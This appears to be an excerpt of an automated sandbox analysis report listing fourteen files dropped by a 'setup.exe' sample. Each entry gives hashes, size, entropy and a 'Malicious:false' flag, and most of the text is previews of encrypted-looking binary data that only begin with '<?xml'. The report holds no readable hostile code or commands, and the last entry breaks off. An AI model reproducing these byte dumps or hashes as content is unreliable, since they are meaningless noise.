              SHA-256:848D61D5B6EA7113CD9A2981F89A7E2772C90569E02C3450B8AED9A4314A3298
              SHA-512:8A8351A5C97F920ED2D3AE86BE165D29D5C5EB5B7553673CD797C6460AFA7ED9ED78D18B592E41169F2B3B087A2AF8EC1CA494229581B5B59501D5104AFCF7DE
              Malicious:false
              Preview:<?xml..?....<.p9$...Uw.%....1.k3....R..t\F.A1.`h.X...NR&+\?L4..b.\..4y*U..8..LQ/.....z.4uz.zGE..^?\Mi.........#t_WR.....K&...O...C.zI,....n.~R...X.|K.U`g.%I...[.d.8y...B./1Z.zq.h5.-p[0..:3.}.....w..B~k.[...p...3....9.'.=..[f...W..\B...sCN....z.i.M5...$.......[){G/&.2.R..>4.\.....L!.u3.._...Iz,.0..Eh.lz..}.\.."K......u.......]^...E.k......H<-T.eU%......Z...?z6........m..XL~...v.a...m...-%...7.@.G..s..+...,W...,h9..y\OQnu.[+R*1 ..>tF.Lo\.u.h*e{.R.....s'P...}.* .......!;....~l..c..6...}&.!-. J.........t...]...pO..Q<.Qt...3 N*.oN.1......_.....W...;.*.L.R. k.F..qF....%...e.....#...>.........0.......0..v......g..^....j...L.o.').....i..j..}.a1y.Z..@.zm....y.n...../.....+..%.0.px..q...@...1.h...V..}3...f....S0k`.#..5...NM..;...n*..S.3.&Gm.G..Y|..._.xrK;..&....TIk.:..<....M..?Q.M.C...._....R.n`j.".....R2;..T/!..:e.3D(2..pft./}mW.L..v...z.9A}o.V%.8....xz.T........g0(......qh.x.hKs..1/>J.....b...H.3...N|...a.P....\..%>...?.=.....+.P...18.7_hhs..O.......2
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1740
              Entropy (8bit):7.8939577837729695
              Encrypted:false
              SSDEEP:48:lpLdtZbb5GNv5JQz2eTD2r4WJOnxHgIWD:lpjZb9AJQzHTD2rVmO
              MD5:DA5FC0F2EF33ADA7BFDA1E58FCE6FEBC
              SHA1:F5BB3FCC55A9238EB8DA5B244102271FAF14B88E
              SHA-256:72E16764C8AADE80C645DEA78BBF993A861B3E9F9234DECEB3E071CAB594413A
              SHA-512:FB2573FAE8163AFC0DF5B02B5D8AE913F6F33F824A3DED7CD14362CA6A840D1DFBB14C4CDCDBF321ACBC97EA38180E5E02C1BC94F0074659A5F6F792A954597F
              Malicious:false
              Preview:<?xml...L...........g..z...G.....~.o...{......D;..<WInVY.O....Y.=.B.n].....F...k*.Z*."N.&.:..+TocB.za.p{F"......a.f z..rk.n|S...^...%}D._.....R..\G..=...Pl.`..=.C.v...e[N........,?...ee.B$..s.,..Z(.>.2X.....).....5....q9.vO]..BD..H.....L).z.a....D.T.qN..q.b.6..q....#..4.Ls_/v.!...?}.?..<.n.`.@...2..6.........09~...I=L.j(.A..O.XZ.h.[<..~.F.4N1J.Y....?.tQ.ea.....m.E:......}.#..........#.&.0......yj..s..1C._=.-...%....&..5.S...0%2..[1.......$...7.28Y....N..c.;!..{q.W.q[.VP...'v]d..av.>e.l...O....K..K"....x),.q..{9.....o...%...eV...1......U...fhX...i.e..e...Jb...h.........e.".T^N..S.`-*~.)C..."....A$n+.c.....Y@..y..l.N.PHF....n.&=.w..r.#*..^.*,..wu9#h.....).p....V..[.!...Z..H.UNTp..O=.$=q..Q.Q.<.@..j.S............(...h...aY.,..WD..D...Ae...<)H.Z.N.>_.&.......m.b...Z.I%.'.}.&o...!.......p|].J..pBXSqk...X..|..h......fZ..G.=*..1..^.*....w.f..Y....9KH#.=...F.]. ..6~i^s!sR?.J2.........."0t^2?..^..X.T...ZA6$...~..y..W....C....M$.b..X%~5HI......
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1697
              Entropy (8bit):7.869290620311951
              Encrypted:false
              SSDEEP:24:HTUvYT8RhVwtqk0qpXJwRr9Gm/v27qV/MK6nV0qvFDEcyFKRy9IXFkaZgqWDZW08:QAT8X6t0MsG376L0OqZys68O2IWZD
              MD5:6672C1109362B073F758F402B1C07413
              SHA1:F36121AC7D01EDAE0EC1664180BA4EAE92C7EC13
              SHA-256:03D7162E20D2DAAC78B45CC01AED3C87B5CB45ED81AED01914FED74C07D52DE3
              SHA-512:67A3F02075633D1194D667D9011403149ACFCEC8EA5F542A7C1D9F8CA36C6779ADFFFFC61418DD1E126A4F3F555D6F7E049FCFEBC05E8D3E97E840CD08F5700B
              Malicious:false
              Preview:<?xml.3...z...;.........Iy.t.N..=.JSH3..t....._l...b..;....F_..@.-.d.).1)......}CI..\..|..$.w.7.iR.Z..T.......|.:.F.{...Z<<.....(......._..h.M..}.^..ABv...#&i...<-..Q.x5H......1=r.Z..N..p..3..7..k..5a....~.jct`...FU~.G89./3"?@3H.B(.CU.f.;g..J.,r....2D......{.......a..^2....+..F....W.*..v0..r.....>.....`a.7..X..Lw.....a.#..h.B..o~L...!'.*.Y...mF.=E.....~..........9.'.....P.N....1T.p....$.r.O.Nu..QUJ..r.N_...L....N...nIM.K#T"..G..K0..*.'{.K.'s!........o.k..}...'.137c.:..T..^.u!:z........5....PTt.D..y..O[.cTh...j=.+S.<8Zfo8.H..N6?O.....t..T..U....|..+.G..3U..j#..J..z*..VMt<<C...._.......~...C'.g.*?K..ZB.#...C..W.....E9....#.'.P..u)...&.lgl.........s.BzGf.^T<..*.L=qH..6.........|W?.!...n.F.h.]x L.b.!.A.n%.[.O.......hJ!u.9.."..!./a[....u....m.q..F..M3...-.....I.2l..~.w.H,^`....l.........Yb.t,...5Y.=k...'3........'......-M..2B....M..7...G.l..9..nyQn.#..SE...In/.d3....t...LJ.sVR.3...yq.....LKW.Y..`.../&"..^.....S&..S8.O.fl1h.E...w.@...(..}...+H.j
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1734
              Entropy (8bit):7.869001402689939
              Encrypted:false
              SSDEEP:48:UN8vIe5Qy3V8k1mNWSYgNiUZXD7pWQvGnyICAD:+8vIQl3HcNWSY1UtD7kUc
              MD5:4C5CAB874467650B919327EB3833ED1E
              SHA1:5B3C19D012A94AEC578D8C7D043C477E65F9E399
              SHA-256:428B108F5148F4D0EDAE3F099205E69621F0D377B85E0A93B053599A8572DC7B
              SHA-512:1D392723DF147265CF4421FA3C0AAA98C1BC4654970F554A9C02CAED73D35AED78C53BF4D7D98044FEA7E30B7F286A1C38E77796950D149F19D06CE880A6D9E0
              Malicious:false
              Preview:<?xmlvJW.....r..+3p.Du....#3.EOR@.X..Ne.r.......>..e.x[M6..XV.3t....H.3....v.?p3.Y4...O..e.O"..2.9..;.[..4=...]&.Vw..-.S:r...o......4J.`...h..#....L......wX...}..@.&.B......S.+Z....=...9.Ah&..M. ...iX..].smF?.`....1....=B.|.4.V.9m.}[.maF.N...V..bc>...0^.k.R1j.m& ..|....hg...G.OuG.{;...v2...\..c..lR..j.^.....g...%*../.2....&..L$..7Ej.,pDb..aO..c.8=.[.Y.p.F..G.9...L.......t...8N-......!b...e..E|.=.% ..S..!.A......%......X5:.m@..:h.:.,44.5..8O.Q...,U.T.......>^....t.|h".4.:..`.8.P.#<A...R%.&...^:..;..8..."9....;8...]|..2...$.!....G...-.(.V...............D...[q.4....u......Psc.v...OT#[c.0.:i...23...xk..H...0.....)..5.B.1...rQdq.Z......3...u~.5.8]........Av...7DOf.....s_....s......5.."D....{......5.....z`.....9..B.....kv...K..:`.,ph..A.^.*.p..V!.l....(......?..%..6[p.p......4.b.....1.=G&..Rr....I.V[..bq\\t.a...K|9..E..Wg.T..5K...&..<...SZ..k 6.{........+.....4@.......3.....c..tg=.^X..y.F...Y.|-...G....,C.8..>_..jM....T.|.S.A..y.:...z.f;k..t
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1697
              Entropy (8bit):7.896046883542324
              Encrypted:false
              SSDEEP:48:MyV11w1dm92+0y2vbqHOUWnyIYypbU9BUBtZ6D:J1G42+d20YyXyBaO3S
              MD5:F89FEB51E9A2120F27747184DD34E704
              SHA1:ABFBF64FC784A540BB657CCDA9E16CA01CEBDDD7
              SHA-256:8815088C5A22B9882CD52CBE8D8F6C7529ED5E7EB56DD103DCB12EFDEC3E5206
              SHA-512:DAFFD3251FC5505561C39E7D803A52F5A368E6F43A99840D58B28AC46A89E6F3974763DCE8954B7BC4EA68D680C8CA6DA73B7208E469EB5680D20CED1EF5D131
              Malicious:false
              Preview:<?xml...X..E.y+B..w..|.G...P.CB~..a.....4.......A.].....Jj...p.3..BF..2T.Y.)..vB.Y.\.`.v.......Z.........'.......V.G...j...%1(E..\p..z..O>4.........z._.~.5h..w.x.a+Q...........1@.....r...D.s'/Q..1..)y....'...Q.......1.7..D.H..x...8......H....g$.>......{.,....!.L......+..88`..b.".+fHP;M.lo.....$.v.I....(...Y..!M.v...FZ;%.....G%..\.rx...........B3..}....C...<O>...T....V]o7<.T..BjE.......R.iVws...t.7xW..=....<..b.pn5..AC4K..xd[..=.:P.:....B.Z..r.;.....3..Cr|...n...X...S..;.uN...<..MA.......\Uw.....[=a.JX...KJ...Z.%O.......H......y....;EKf. .....k..0c:%.3.G......(~.Y..,.B.-..O.L*\....D<....*.'..v....Q..?....."@.o.U.c...!.Gt.H.|......w..R{.......M......b...D^....,.A...W...6..n.a-.....g.[........O?.H.]@.z......J..r...U3..?..g7..Ou....M.O..2.S.......|`..e...".$.b..t...7../.T..5.....,..t..h.o...>..a...HC.U....f...............06*'...n)."._....R..\..i(u..q.z.~,.w,.Xi....zJ.J.zv..D#................|.`.-+7)....|`3^)..>.b..X`~.Ro.!.......G..B..@18dRz}d..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1734
              Entropy (8bit):7.887346129560221
              Encrypted:false
              SSDEEP:24:wDUEiHJkmiXrRVrvsXwVf5m4Kk3c7+xs0WQRefIwjyPGxr0h23no1qtL7abxD3ZZ:swkFz5PKk3u1Zc8nxD41UkD3ZdaD8HD
              MD5:D49F0A3769F7E8D005438C36F187BE76
              SHA1:18866AF2ABA7424AFC92AAFDD3192B4ABDBC0D8F
              SHA-256:B72B938069C0CC55E33E0D0942FC3617FFCC52FF9032044C1761DB4FC3F5D50D
              SHA-512:9F22DF966A2D50628106E2B59CD4BA5E18A4350F5687B09B6E7BF4790241351784605CF3702455E50D09384C7E9431A3C9EDE4E9A2A331D965F4B93344CBC5D6
              Malicious:false
              Preview:<?xml..scMuD.[c ..~.....QYV...7..Skl.........dv...8(.{.....t..eU...n.4...i....%J. ..z..1..x.i.PL.\.~....Mi<o_.[.<...S.W..2...>..w..#...tM.b$.&..eJ.!~.>...H..3..8......k>~..g..y...u#_.!..7.@W.......s$..)8P.~.1[.5'.c....C.Ub...TS$...E.J.-.V....f~......8A...q[.k.].m..B...CJ|V.g..q...=.dG...X.p....:U....+.Y...Aq5..(.c...Ap;...;..X...L..@..6..T*.....%...G.g.5....[...<).Fw.......E..&......@..BF5.....%...9...8..O.\..gQ[..u.q.......*.....z>g.$.J.^..X..4...`...J...0..B.`.<..;...1..'Z.....v.?H..L.0...<...4..J..J.9X.q.....IH....0.m..4...X7*..6.=.qk.^ss0..E.b.YN\X.n#..=..".........G...)\O..M.e.Z.Rm8...H!..c....b.bct..........>rJM~....c....\..}.f#1.M/.av.X....u..u.C.+h..y%.mR...J>c?p.OiR.........~.p..V......@xZ..U.....6....V1.vJ......[}.V.H/....^.&\&.9.cC[....|.....o..t......:...f!.;v.........\..6.z...2....U8O...)9.........m....g.w^...&Na{.<\.Y/.@^F.?*4../.=.9g...........0.!.[......{........Z.<5..e-.^H....*i"f.y>.n....?..h..I.b,.5.^..../........-....%.*.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1701
              Entropy (8bit):7.886082914136119
              Encrypted:false
              SSDEEP:48:5jGUiI/08pK5orpW/rbL1vPDCrQppyV4Q0D:5jXT00KApWzn9PWrQbu/g
              MD5:3A8173FAF23A09014DA4C3C760C039B5
              SHA1:8F375833F837F57EB12F69FC51B0B11B7C03D0F7
              SHA-256:DE5FA7FAE2158AA704A559AA9AD3E9488589CE36DF5B85AACFD68F9A1D913FEA
              SHA-512:23BAD5254BA27ED6F7A9FE6F965940C53ACA7CABB49A7E7DB93707FE8FCFBA89D347DC34C0D9FB23E0FD5CC54EA0697BF4EBE0C18B433553578823C73C8C0214
              Malicious:false
              Preview:<?xml.Gp~..,.M.Q....0.......<.#.Km....1&\(.f1b.1.....<.^,..).....R%........s...m.P....3."....r.(!U.O.Lb.x0..c.......... .jP.q........J....V{#.......6v..H.r.$......s4.....!.`..3..8..Tt...vR..*....l.}k....l0.tJ...V...F.{.{.)..@..|.U/.=.=..%.;.{Qf.q.D.xy...%...k..F.l.7W...........%n"},...J.P..q"..V...,.(.......e&.z6E.....*...b,.........?H<%9..c..E[.p..G..6..j..,...i..~.V.[gz.o.H.&?.{....(.&.......?..h....X.7.DL..W..0m.e.5....rC]L...d.&|.#....p....>..A.|..yT$`.M...'..[.......z.u2...{.Q"....h}..#e>.........16..".G;.....(7..?3)b.06..BId.`...M3.p...+........Y..._....K.A.4..T...-#.}.B+K=$..3{.k...2..s......q..._..o]...y).H.=..=.4ON.H.........s..i....P...N{q...}......_....5../g..-.$..Q..x..p.Y?>W..)L..^FM...?..K..U.O.V\../......k.Q.]......'...1.t.)..E9........,^..u=._.3.._.3l0.c.%.;f}.....d;./m.\3.]...7(>e.?..a...".........1A.jT....|.d...........T..B@....%.....w..e*.<.Ns.... ...p.....G.B.7..X.q.S#.uO4%..v.t.=.w....Q.G...AXB?.f....L.3L.[...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1738
              Entropy (8bit):7.894219987495562
              Encrypted:false
              SSDEEP:48:dkaHUTfH092VO/mqOlSP7wDnsYAa4pOSm5iEyD9AH0P+AD:dkaHUT892oVpjwTAa4sSmSD9jP+c
              MD5:7D350E40477546C9BC07D6285518A45D
              SHA1:A3A8A633DA91993199AF811FE429250F1B617665
              SHA-256:04EE5EFA74C2ECC3B485E5F32E88C8F0ABCD36C83010F13CE66878B19B15B069
              SHA-512:7109854C4375BA481BA7F307564D1F7762F055669CBA71564E4976B261C3629DC2CF7190D6755C2B501FC07F30339D2A196B25E87F2F6D293848BAA6200B995F
              Malicious:false
              Preview:<?xml.).swe.m.<..._O..?....e..v.#o#. I.j...4. [...._.....#...x}...'u.....$...m..1.,.5,..".+...^...;.J...nO*.f"y...*EV4..z...\..F..MT..c...:}K..N.n{O..w..{...BlqB.D.....K;..vj...r.....v.A.0.>.......h2..'.....y....s>..#..=[..7..L..2..wM.}..xB.2.......D..O...........g..7..H.<bF..?$_,..:.:..u......T.....^..m..h...n...C.....8^..g..^...o:ZeO..:~.'.C]'.......Y..O.B.d...o.<...V6.q~..J.;..;...r.}.`0..>ZA/....W...v ..;.*.A84....M......F.`.xH.'.l...Rz}...w..}.l~X>`..|..r...8..Lsn;TM.....2.J..1......S.............n.......)t..3&;Ei6..Z..cF$c.8w^.......h...l..y.x.o...v..Z3....aQ\..QK...v<A....'.va?RT.....W.+_.sY.v..l.~._.....kO........-.h...8...z.....i....{H.iR.~\.N.m....W....h..e..O24.u&.2.?..L.I=t.p...]Z..l..\...D$;s.1....)..t)kF$.f.=..9.....n.)b...(..5.+.1..:....P.@...&..j.....p.c...P...=.Y...f....M5..gBI2..>x5..-.....G...g........!..T..4...oc&.`..c.c..lh.x...f4...nh..H.)Be.o..z....7'\u.P.....{Y.0.D....O..V....0....2{.M........(.Q....J.....6.)hd3%.t.n.l.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1705
              Entropy (8bit):7.891299742653723
              Encrypted:false
              SSDEEP:48:dk6OqZwN1f4SS6D1/ljujqD9t3gTr5up8fD:davLf7Su1/lCqDZM
              MD5:C71CD4BB5D9E41720C3163593778EF64
              SHA1:76CE1CA6946C7AEEEC1409BA89B57E5FB4DED936
              SHA-256:0BA0DC63FC934FCC7661643142EBA22B2BBBD8C686C5F3490A760C1395293AF0
              SHA-512:1A5AE789D6A79ED72BA20482840F17CB6A0DF6A9CBD7F122797552F3CDAC19927CA3F5CDFD589E5D8591AE3B672B33B7029C4FC8075B75174264548034E3F10A
              Malicious:false
              Preview:<?xml..B..`...j.s:.H.<.......Cy\'.M......WEm..(..G...t....dr.....[.8I.I...0.......v$..~....s5..)...h...|....T$......^..0.d.J...@...+n.-a.9.#.=\F...o<h..QZ3..1.S.......h~.. ...Z.....%.............!..*Cl.).]h...$...4...m.u.5B~.....1;sp.}..7'..(TY.o..P.l>..R%V....L.W..[ZG=!8x..t......hZL....q........h432~e...5..6%6....a/....#.....T1.w.v....7t....a....\.:.nHk@....C$.t.......X......n*...L.I.k"./.@c...9.f../..dQ..9o%....1.Y........4...Vb..R...,.Tf.tL.qV.u>...~V..{.R.g..Pi.I3..^......U.{..T..g...-.j;....#k.^...uZs..S.aD.)k..&|....I...D^58.{......;{.I.....K...wIk.......^w............!....3R.x..C.l..u....X.6kH............,.`...t..\,..~..JamQ5/....I......<.......1......>?f.......[.l....'....%......XRQ.y`.....r..*.*.\d.....L....X...8...v^v.8m...Y.|...8T5...`&..#^h#d..P,...QFb&.kC.4.OO....#...8..j.gT......I.s"5..P....Lr.....U.yw..E..^%"]*=5....&..z"W..&..j.....%r...v...B..'...f....9.%.>q.:b..C..nP..0.&la/....f.<....x......!.a.?..T
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1742
              Entropy (8bit):7.881258683882431
              Encrypted:false
              SSDEEP:48:HiWzZU0A0mBCo7DcAXR+6rRGA6zjb0oM+lwsU5/ScQtbP4PIQeyCtwq1EGRqZD:HiWzy3fdooH6zjbRMsy5/ScQp4PIvwOe
              MD5:E2E9E612BD56E35DFBA04A4F8796DA6F
              SHA1:0B7559E857BD7EEA52D23AA322C8B92B2844CB1F
              SHA-256:E993F74DE0F634C48DF061170B4D75BF17530D5E1C97C7AB4B1DC813C0C8C01B
              SHA-512:171A277B0C503F1CDD20500426E244DBA23720537D95AF20365C6CDA1E7E1254937ED3C274986388E72292AE5076701C1DAA41775787A2A4B2E09D184008C919
              Malicious:false
              Preview:<?xml.a.tw..w-k.......}.l.....=&...dk/.K.!.dKvL@..%M~.[.......l.....~..IF.~.m....f66bJ'...5..z.}.<......A..Dm.i.Y=..0...(&@.V.M.z|..l::(WR.q]5...+..=...g....=.....e3Q{M.Y...:}..{......?&.V.h..Y..5...d.2C9...?..............zu.{.y".)C.?...'.0.2....\..65...;bN2......I.M...M..]...(!...-.^d.*....M.....Y@h..3..?.F.e.y.)....G.......7..j.q.?.h......H`t.@^qQova.Z...M.....|..wS...~..'~3l.X....{.l......-g]."A.WP.-g.....;R..U.j.....:.........A!.e.y.b.3..91mA3....^t.BZ..P..<...E...X.MpE.4...C...3.....c..M..f......?..4mK3.$wY.d....m.W...O.V.......w.q..{w...V.(.1.Vy.^.>....=W..&.o.Zi7:.......,.:....7..Ec^H.+.I<.#6.Wo....zJ..]:....X...I*S..e.z.Q*.......R...&^R...a.8..9.A+.#M.a.%....k'K,s..f.m..+.[w..[.......E{..d...?0.r.H........tM..v....f...A;x.<....(.4...-#c..x..I ...9y@.H..i.....&.....)vY.`.....wF.z...&......,T"Y.3i.@. .f.O)2vX.tcH.?.......:j...X.SVu..CC6.Y.3..;.g'......>}......I=...M|...Q_+..z..B..z..]..MG..7.......f.....(.^..g\.h+."1A.K]........
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1719
              Entropy (8bit):7.870873871428056
              Encrypted:false
              SSDEEP:48:lzG9GgCv/aucspMv2vS7EuS2LalP9bEz6fD:lAOTcAMuK9LahN
              MD5:064942AE668222D7DBCA3ECABABA7FF5
              SHA1:05488452877DBEA9366B7706D96BDA3EF2C8A3AA
              SHA-256:3CF44BF2D3EFF6366DF089E11EC1BE8EAC832DC3528D6B3CBB7D974A94CE57C6
              SHA-512:F9E38D244E26A9469E6299F3CD1B56D3FA93F86312611FB4CB5105D8B3069F128C695C56A3FA50E8CBA5EF24F107D4C1BB8704D8B0854BBF0A96D44808BAA9E3
              Malicious:false
              Preview:<?xml,r.y.....,G....L.!-..:a.o=..Z.{^...i,g...................6...3}.l...[..H?|n..v...b..|.?.g.`....x~..i>.C...h....)q..<L.. .(....J....Lq..:.~8I..c.a.d.-Hu.n..h:;WI......j..A.zz............l.\`.f..]..+p....E..A<....~$.sxt.....E.*Q....X..:...~X......#m..e.n]..Ow..O...$.=.2..S../4.....$5L...,.Z.W...9#..x..l...W.}...G#.<b..._>.L.......p........{...W.......-....Xx.&.g)..^..&. ..Q'.............8.t........S........9_.|.X......3..H.6...l..N.5tS...p...[....H.F.(K@cb....M.A3.............9.Nb.A..Z'...6.D.<..Cl.....2.O.M..,.X..2.^..]B.&(..sC..Q....q.C...}&.&E-<.`../..2.0I.T.cSf.I.\(,.k..C.&.M..,gl>.<.uk.I,.`i..Y..k..j{6...PF..........2..H)!.e7....iZ..CkN....5Iw.s&3D......9.xs....`R..ie.d...//...nS.........U....^.t2.x..;....z.!..*..`..;5.9...j.@.8.W.V(y..~$......(.P...^TK.7.......Q.r.QM;.e...B..y.z...V..9....!&..,...S..i.Z........N....5A..=?..i..^c.Zz;3.......u{..8......G...j>.(UE.....O......^..`.%p....5.N%1y...N...J..h(..C..l.K..S..?.N.l.^...E
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1756
              Entropy (8bit):7.895401743003862
              Encrypted:false
              SSDEEP:24:ZkRczRiRbG8KI2QnDceRg8hLfapGSq09APWNHBsKs+35mrl/XjvZAZY5T+UuMwHz:eGzR+G8KI2GweRgeOptOWNlS1v5EZ3D
              MD5:3B0F84F4F1CDA320D9633016E6AD3FC1
              SHA1:B61818F82D9C813F1D55151B641D4227D2B5D7B6
              SHA-256:AA33C71DC868FCEBAA634217AE5FF33DF6B6A89AAE3BED35EDC057AD050D3E22
              SHA-512:4F0BA2C677563A0380A42EEA2DABF81E97A432D065C7BA2A50A2D0F68ED4AD50CC94B5F4F5E1411FE519BF4493AC8C70C0D058ACD1D525CD8BB057315A8B191C
              Malicious:false
              Preview:<?xmltw....g9....^D{.S.N...sg|I.*...eQ5.<.#..X.%uw2...>x..B.=U...UM9..4.z.7.K......Q....6K..CI....b.K...6.1.x.I\...Z..TdC.......7._.K.?.......(.....X..a(}....2,..._..6..Wwp... .....`S+..^.....WCK.Y..H.2.$@z~..iG...\.R...<..%o...["`nZ..!..../m.'..-....:g.UWs.@ .,]y.iTf....._....5.\.E.4....<.i..}S..UU-..c....$=.8o..y...o..Q..4a..ArS.<{F...)|....Le.+.~.......$E...{...I.d..(+.8..7...0.B........D.A-t .........;/..D..VK.f.g0.{4}.2..V..Q^.%.....4k.....W.G...t.P.b7Qw.......U..w4.k........HB.....K....,f....4..lw.~ip1S].."..........jE.@..<.<...X...4.x&P\)...h..]O.............<.;..l...S.v....:?...M......Bo...&.._..G.wo.Y/.a.B..m.L.+cd....;3?.P....R...<c\.al...S...b..C..f.G\.8E..Xs.zZ(..G,.W..4#c...F..+h..:E.....j.......e?O........4.X&J.zV..8.n..C.OhDU.. .."...v.5......j....L...^E.*.DBR......ug.............d.o...5...N...M.C~..?l=D.T...O.w....E.l.P..3..Y..]......Z.o....=X.....".....GM...5..n...q..........]gD3.3...c......].3.&p.H.Q.....&...`....+?_0....xj\X"I...L
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1697
              Entropy (8bit):7.884777506243479
              Encrypted:false
              SSDEEP:48:n0FmzlhT6GlK+u6UTDAGSRwmgX3jXZVJD:n08f6KKUU/ljXZVh
              MD5:4B21D48DF1E9E0A9834334EB40A1B578
              SHA1:A157780A6FF9103A0D023BB7D18FDF978ECC3485
              SHA-256:AAAA6303F5B6E7EB6B678E752C5174E2425598E24F2066447D53AD0311070E37
              SHA-512:89E6AB5DCB945CCC6A7066A26AC34393EE4803186470AA0FB101FE037AD375897C7F3352EE5A7E063304B4CDC338F77A0A5D661A8474668C78DF4606D22FD02C
              Malicious:false
              Preview:<?xmlD.G.)..2....-z.....wE..o}...h..?60gd.Bh.X...`w$....F.Y.hw...._.......(0./.<F.W.E3."..y..P...}..\k..I.....=.gq...TI..b...K.1...."....*.[%....YF...6...**S...".Tfl..... ..L...5..N...0....j.. $.....]o...._&...L' ....I.....[x.,h.C...\...O...g.....T..R.....(6.37.kJVL....v...N.8K.bS.....".....?.....0].`B..gH5G..|.H.t..-.(:.b"=JA.Y5.b?..P. ...,q.j...Ig.P3.#...........M.....C.c...T.VG...[..j...Pq.........o.$.d/.&..h^D.[W...R..gQ..k.\6.P..A.t..j..]n....8..M..i\i... f....1a.q.bR..+.....1k..8s...3#l.....sX.%...`.x.3.zd..v.....K...F.E..G8.K..$..> 8...;.gkH0...KWj..r..3.D.}.{|.l%.!b..q....ip..77..Dp.9..F...{..H...\....._bHu.X/;..b...)&c...Y.7F.?.......TH.X.H..A.miXW..v....lG.l.O.......?.HT.%.):.Q...O..........rc./....4........~i*l..O.....!Z .....p.g.O.%.L..]{q.y....=.|.x....M.zO.<..(..O........,..=gx.,.?$9..hWk.V(W..}...U.}......R..~....j>.....9..|K...ua....[7....i..$.p8.....hu=)..E.I.@..l........u..ff{...$.>..s.C..\`.U9..?._...."....C"_=....x
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1734
              Entropy (8bit):7.877467562625971
              Encrypted:false
              SSDEEP:24:Xm2eAkTzdAxUmnam2A8RXM3wR+mVv0nqHi3I7lABEgATiFK+g6Lsw2X73DmVzcE9:2tx5jLXM3hmWYBd8g6LSGqzqk+ZFoHSD
              MD5:C334328D086AFB2A3976CF2D872A271E
              SHA1:2EA07D73725ABAFBB87980470E7144F30D8B2882
              SHA-256:969A1C504127F973373F0131EFCF5950D41BCD28E704D49BF663A7148595EB51
              SHA-512:9AB7DC870D7A7BD676EEB54BC6C42771310847473CA1A724255344B210FFBAA3822F7F5FBC77AC1EF0A9FBAF5833AB7A483C0FFBA520917F349251B1DCFC60F2
              Malicious:false
              Preview:<?xml..5.i..ZOEq.....9......)-...{..`...*!.7JH..k|.z.].D.*.m.B`KH.r...K...p5.P.....<}..>.....x..r...r.w.i.v..n..`..V..:.o....4.J.....A..#A..5..]i2.'...x.#.5.~.Lo..I...xWD.V/]..S."E.....8.d...w...$.D...."~...5.w...g..f.4._66...&]'...]..9.E.\..v....m..z.;.%S,X.Lh...JO.04Q......<,...]P..G....O..SS..Dg.}h...~F..^.E]7.~...i...KF.....U..L.O.od..7..k.X.YpA).t...4ri"..H..cs.......3..9!%_..$....D.....{.[.>Vbm.....Z.hq.../]......N.aoF[.=.K'LQ.91../}_....$/.{.....g1...[..YS..vZI\~.Y..B.c.m.a8pB.%......%.....S.>.R..(<.4...k.3...:Cj....1 .d.d...M.H..u.V9..Q..k..U..F......@..P@.^...6.....i~\.<..|.A......+...\{.8.."...Q.+.3`/.g.-.."..........q...(N....h,..P..^.......l.{Z.!wBL..L.i.....L.TH/.`...m..q.Z4(V......zb.|......].....B.>.w,..H2!\O!....F....;......s.7..+f&A.7..DA..'..B..#9s/....Wm..:.~..I.:....N.....~A?<.i.$..].z.(a...p.D.4....C..-....6...<.k2......_.....*..!...:....&'.Q.J.A:7;....>...........'....?.T.2|7.@......G6JpB.m. 7.t.s..3......+.^.R.Y.M.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1699
              Entropy (8bit):7.87645524615409
              Encrypted:false
              SSDEEP:48:glqOVFsAdVbbkC13vzeQrBqUIbXF0LlDjqebAbRLF/D:M9VNbkmFEXFcliJFr
              MD5:952F8348DE6FD4F8FB35DDE21FF0F40A
              SHA1:2B515F4B550ED0F3BB07E5FFD641B0C328A597D7
              SHA-256:5166EF00BE7802FAED3BD3169D3C32D9D412BFB4037D89A3B1AA92C5C4FE971C
              SHA-512:14D30452025F8E81747D96D29AA23F0D08893A10FADB9DD7B482D091D90148D727CC1C04CA3A1AAE9CB87E10DB20E0B06C6385742285100431A0ED7E47304873
              Malicious:false
              Preview:<?xml]...#..P.O.M..N>[.`.J.sK.E.FySR"".....e=E..>4.u.D.m.....i#....*....s...G.=O._..6Hw....f&..e..+>f.rF .j.......G...u..Z.\'...u...O....+../.=.z4.@........r+9x`....-......;!.,.....'(...Z..'e..}...9*!..KL...!.E.OAJm.....63..}|....$nH..............I<D1YF&.....vU>......B.Z.]4.g....\=....4...9...g. ..p.U.]...$...^.>.....i8...Q.. .....S!.._.C.&.R.....=...}..L..J=..h."2.,.,.R....;..vR......h[r.ZK.,.@L....}U..MY@.A.M.Y.h..K..`...gJ.......Kcb...&q..jU.O.cg0A....=I...K...@.)<.i......_.){Q..%...Y.J<..9Q..p.x....`r~.K.3......a....t*P.....Z.HE.'/.T.6.O%..M.....%.|u......m}.0..7.....gl..$.g8F.9..+.w.;H..>..i.......-r=./.ili.....f.......r...:{V...p...i4._#r..C.aQ.C .R....)X....{...$.xi.Q.#.Qh..xG.....(.....{c3.>.^..&....{...v..h.x.<..+.1(pWH!a..PI...w2.$.`...5.F.3..X.|.).[...dWE...._.U....R..*..|....W......7....PE.w...&'.x....h....i.B.s.......s5..9.B.o.K.........c9'_...E_......3...<N..P.m.m..j......~...J.G....?;.N~....5.$.'...6da.....@.....l.....#..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1736
              Entropy (8bit):7.880038741172485
              Encrypted:false
